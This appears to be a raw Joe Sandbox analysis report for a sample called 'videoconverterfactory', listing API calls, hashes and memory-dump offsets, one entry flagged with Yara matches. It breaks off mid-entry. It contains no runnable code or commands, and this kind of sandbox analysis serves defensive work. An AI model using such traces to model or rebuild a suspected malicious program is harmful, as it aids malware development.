                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: 33a50c7f1ba77d4b4e45af4cd815d42ab1e4dcf827d670273597094d8737c91f
                                                                                                      • Instruction ID: 4671ff151afe005ff32d1113959b2ea15d198d5837c009fe97aee26fa1719287
                                                                                                      • Opcode Fuzzy Hash: 33a50c7f1ba77d4b4e45af4cd815d42ab1e4dcf827d670273597094d8737c91f
                                                                                                      • Instruction Fuzzy Hash: 3CD01770A04108CFCB04CFA8E994AAD77B0BB09300F20407EE023B7292D7395849CA2A
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ManagerOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1889721586-0
                                                                                                      • Opcode ID: 4fce05a2aecd0fd816710fe21629de41e2a4365f00b6bb562a93242a9452cde1
                                                                                                      • Instruction ID: 06d02c972e80e358b0e68a9aeb4a199014787f64cdd3e6f27c2e769f8af19076
                                                                                                      • Opcode Fuzzy Hash: 4fce05a2aecd0fd816710fe21629de41e2a4365f00b6bb562a93242a9452cde1
                                                                                                      • Instruction Fuzzy Hash: 6DC08CA480820AEEC7400A904ED887A359C62053087704037EA4BB20C0C63C084EE1BE
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CopyFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 1304948518-0
                                                                                                      • Opcode ID: cf4a72921bc3948d6a58ceb73e5a51018bb366a8127eab82c727b19e0eb5c253
                                                                                                      • Instruction ID: 5830152bc81dadf39048558d2d473c3636cf6b5f0827cdce240662b1f189e88d
                                                                                                      • Opcode Fuzzy Hash: cf4a72921bc3948d6a58ceb73e5a51018bb366a8127eab82c727b19e0eb5c253
                                                                                                      • Instruction Fuzzy Hash: 39C09B3150810AEFD31486518E4C6F5765C5B0978072444779D0BF60D0D63C454D653E
                                                                                                      APIs
                                                                                                      • CloseServiceHandle.ADVAPI32(?,?,?,?,000F01FF,00000010,00000002,00000001), ref: 0040D785
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleService
                                                                                                      • String ID:
                                                                                                      • API String ID: 1725840886-0
                                                                                                      • Opcode ID: 172bdecedbd0935caffae408475e28bf81b9defc2be3a6aecb54850ecd2a8002
                                                                                                      • Instruction ID: 4b6f7c2e31fd775f2e93b35ca9f2aa5c80254df26e3c4ffd181d32aceaf6e24a
                                                                                                      • Opcode Fuzzy Hash: 172bdecedbd0935caffae408475e28bf81b9defc2be3a6aecb54850ecd2a8002
                                                                                                      • Instruction Fuzzy Hash: 14B09B35554106EDC7D506D5485557A7E606B04710F300516DB02794D453775055F75D
                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNELBASE ref: 00401E02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectory
                                                                                                      • String ID:
                                                                                                      • API String ID: 4241100979-0
                                                                                                      • Opcode ID: d550fd07844c3d1a2baddfd92bc6ac1c762443bbba06a6917c00f01dc53cca72
                                                                                                      • Instruction ID: 59bfbf43eebea8667676f86c4a0b11b8da1e31a275978166a459519321614bd5
                                                                                                      • Opcode Fuzzy Hash: d550fd07844c3d1a2baddfd92bc6ac1c762443bbba06a6917c00f01dc53cca72
                                                                                                      • Instruction Fuzzy Hash: 6FC09B71559514DAD64457D0DF4E99CB1685B04300B3100B77646710D18AFC05899AAF
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CopyFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 1304948518-0
                                                                                                      • Opcode ID: b8cd0c932adcacab04f54f8dc31ece69858bc13fc40c41d452594681302562fa
                                                                                                      • Instruction ID: 35872bac01ac441876356c08f32866b73c853217b5714159c719526a56506d94
                                                                                                      • Opcode Fuzzy Hash: b8cd0c932adcacab04f54f8dc31ece69858bc13fc40c41d452594681302562fa
                                                                                                      • Instruction Fuzzy Hash: 8F900221144100AAD94007905F0E75526519304701F11417A7296650E149B80089660F
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 1586166983-0
                                                                                                      • Opcode ID: c8b9de3c5fbee0a2c9589ed5f968c72e12a9f2737a9cddf3423576ba6f2da67d
                                                                                                      • Instruction ID: 315160a9ed583dfa8d6c83ca8c387cd1bbb07a22bee655e5d7c2bdcdd1fe91aa
                                                                                                      • Opcode Fuzzy Hash: c8b9de3c5fbee0a2c9589ed5f968c72e12a9f2737a9cddf3423576ba6f2da67d
                                                                                                      • Instruction Fuzzy Hash: 0E31D474918659CBC7209F28AF843E57BF0FB06340F1440B6D999B61A3C7388D4AEB8D
                                                                                                      APIs
                                                                                                        • Part of subcall function 02D30620: OpenEventA.KERNEL32(00100002,00000000,00000000,5FC9B7BF), ref: 02D306C0
                                                                                                        • Part of subcall function 02D30620: CloseHandle.KERNEL32(00000000), ref: 02D306D5
                                                                                                        • Part of subcall function 02D30620: ResetEvent.KERNEL32(00000000,5FC9B7BF), ref: 02D306DF
                                                                                                        • Part of subcall function 02D30620: CloseHandle.KERNEL32(00000000,5FC9B7BF), ref: 02D30714
                                                                                                      • TlsSetValue.KERNEL32(0000002B,?), ref: 02D311BA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseEventHandle$OpenResetValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 1556185888-0
                                                                                                      • Opcode ID: 8a81b355e9e262c675132c54744f5ec70b44da5014479f17e34e4d98c68b0f82
                                                                                                      • Instruction ID: f9b4f252412c12f2cf81bbebf4c1ec9979df530e9572b17fb571d426fbd2d86a
                                                                                                      • Opcode Fuzzy Hash: 8a81b355e9e262c675132c54744f5ec70b44da5014479f17e34e4d98c68b0f82
                                                                                                      • Instruction Fuzzy Hash: 0001A275A44254AFD700CF58EC05B5ABBE8EB05772F20472AF829E3380D771AD008AA0
                                                                                                      APIs
                                                                                                      • lstrcmpiW.KERNELBASE(?,/chk), ref: 0040D83A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 1586166983-0
                                                                                                      • Opcode ID: 690aa32b23632fcd311fc0f116335beda0356db5b4785ef0f64d316c72c2143c
                                                                                                      • Instruction ID: a801b3837c8f967c4525ffeb7d11325ac5279127cc98bd980b4a1f2893c6bebe
                                                                                                      • Opcode Fuzzy Hash: 690aa32b23632fcd311fc0f116335beda0356db5b4785ef0f64d316c72c2143c
                                                                                                      • Instruction Fuzzy Hash: 7DE02B31A08581CFD30357B488559D47BA4DF0231839C427FC1D2D28D9C729404BDD06
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0040D5AF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Sleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 3472027048-0
                                                                                                      • Opcode ID: e7fddf435d80958a4455db2b91cefc0f7cf316680eb456deebc0d239c31a8758
                                                                                                      • Instruction ID: 34e940e1c3fdf395deb48e7dba1d3a87997eec47a2c883f1aaa93066830240e0
                                                                                                      • Opcode Fuzzy Hash: e7fddf435d80958a4455db2b91cefc0f7cf316680eb456deebc0d239c31a8758
                                                                                                      • Instruction Fuzzy Hash: C2C04C34946610FFD74557D8CE45F6C7A64AB44704F110163BA02771E1CA7D46896A0B
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 614f43b33cc88b12ca78f6fb4ac73fbe4941228de5910f39efd9ef586208a939
                                                                                                      • Instruction ID: 3098258b7477cea875b6d534a4b40e97fe70c1b90cdf55eaf587d8bbf08576b4
                                                                                                      • Opcode Fuzzy Hash: 614f43b33cc88b12ca78f6fb4ac73fbe4941228de5910f39efd9ef586208a939
                                                                                                      • Instruction Fuzzy Hash: 6AB09274841104DBC7008FA4D98848CBBB0A700340B01106AF801B3651C7341445AA18
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Sleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 3472027048-0
                                                                                                      • Opcode ID: e7ab4735fcfa765b528c61efa147273846bc9aa0fb6a8a67a2c5d93082110db5
                                                                                                      • Instruction ID: caf02696376b4db759d3268b3f970f57c876f9b0b121a1f5520d37d46a460d62
                                                                                                      • Opcode Fuzzy Hash: e7ab4735fcfa765b528c61efa147273846bc9aa0fb6a8a67a2c5d93082110db5
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      APIs
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                                                        • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                      • sqlite3_step.SQLITE3 ref: 6096755A
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                                                      • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                                                      • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                                                                      • sqlite3_step.SQLITE3 ref: 609679C3
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                                                      • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                                                      • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                                                      • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                                                      • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                                                      • sqlite3_step.SQLITE3 ref: 60967B94
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                                                      • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                                                      • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                                                      • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                                                      • memcmp.MSVCRT ref: 60967D4C
                                                                                                      • sqlite3_free.SQLITE3 ref: 60967D69
                                                                                                      • sqlite3_free.SQLITE3 ref: 60967D74
                                                                                                      • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                                                      • sqlite3_free.SQLITE3 ref: 60968002
                                                                                                        • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                                        • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                                        • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                                        • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                                        • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                                                      • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                                                        • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                                        • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                                      • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                                                      • sqlite3_reset.SQLITE3 ref: 60968035
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                                                        • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                                                      • sqlite3_step.SQLITE3 ref: 609680D1
                                                                                                      • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                                                      • sqlite3_reset.SQLITE3 ref: 60968104
                                                                                                      • sqlite3_step.SQLITE3 ref: 60968139
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                                                      • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                                                                      • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                                                        • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                                                      • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                                                        • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                                                      • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                                                        • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                                                      • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                                                      • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                                                      • sqlite3_step.SQLITE3 ref: 6096764C
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                                                      • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                                                      • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                                                        • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                                      • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                                                      • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                                                      • sqlite3_step.SQLITE3 ref: 609690E6
                                                                                                      • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                                                      • sqlite3_free.SQLITE3 ref: 60969102
                                                                                                      • sqlite3_free.SQLITE3 ref: 6096910D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                                                      • String ID: $d
                                                                                                      • API String ID: 2451604321-2084297493
                                                                                                      • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                                      • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                                                                      • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                                      • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                                                                      APIs
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6096A64C
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6096A656
                                                                                                      • sqlite3_strnicmp.SQLITE3 ref: 6096A682
                                                                                                      • sqlite3_strnicmp.SQLITE3 ref: 6096A6BC
                                                                                                      • sqlite3_mprintf.SQLITE3 ref: 6096A6F9
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 6096A754
                                                                                                      • sqlite3_step.SQLITE3 ref: 6096A969
                                                                                                      • sqlite3_free.SQLITE3 ref: 6096A9AC
                                                                                                      • sqlite3_finalize.SQLITE3 ref: 6096A9BB
                                                                                                      • sqlite3_strnicmp.SQLITE3 ref: 6096B04A
                                                                                                        • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                                        • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                                        • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                                      • sqlite3_value_int.SQLITE3 ref: 6096B241
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 6096B270
                                                                                                      • sqlite3_bind_null.SQLITE3 ref: 6096B2DF
                                                                                                      • sqlite3_step.SQLITE3 ref: 6096B2EA
                                                                                                      • sqlite3_reset.SQLITE3 ref: 6096B2F5
                                                                                                      • sqlite3_value_int.SQLITE3 ref: 6096B43B
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6096B530
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6096B576
                                                                                                      • sqlite3_free.SQLITE3 ref: 6096B5F4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_stepsqlite3_strnicmp$sqlite3_freesqlite3_mallocsqlite3_resetsqlite3_value_bytessqlite3_value_intsqlite3_value_text$sqlite3_bind_intsqlite3_bind_nullsqlite3_finalizesqlite3_mprintf
                                                                                                      • String ID: optimize
                                                                                                      • API String ID: 1540667495-3797040228
                                                                                                      • Opcode ID: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                                                      • Instruction ID: 15d53f9c7948a495e2c6926a79545eea34293df74e7a3e63ea56b3727437b729
                                                                                                      • Opcode Fuzzy Hash: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                                                      • Instruction Fuzzy Hash: 54B2F670A142198FEB14DF68C890B9DBBF6BF68304F1085A9E889AB351E774DD85CF41
                                                                                                      APIs
                                                                                                      • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                                                      • sqlite3_free.SQLITE3 ref: 60966183
                                                                                                      • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                                                      • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                                                      • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                                                      • memcmp.MSVCRT ref: 6096639E
                                                                                                        • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                                                        • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                                                      • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                                                      • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                                                        • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                                        • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                                                      • String ID: ASC$DESC$x
                                                                                                      • API String ID: 4082667235-1162196452
                                                                                                      • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                                      • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                                                                      • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                                      • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                                                      APIs
                                                                                                      • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                                                      • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                                                      • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                                                        • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                                        • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                                        • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                                        • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                                      • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                                                      • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                                                      • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                                                      • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                                                      • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                                                      • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                                                      • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                                                      • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                                                        • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                                                      • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                                                      • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                                                        • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                      • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                                                      • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                                                      • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                                                      • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                                                      • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                                                      • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                      Memory Dump Source
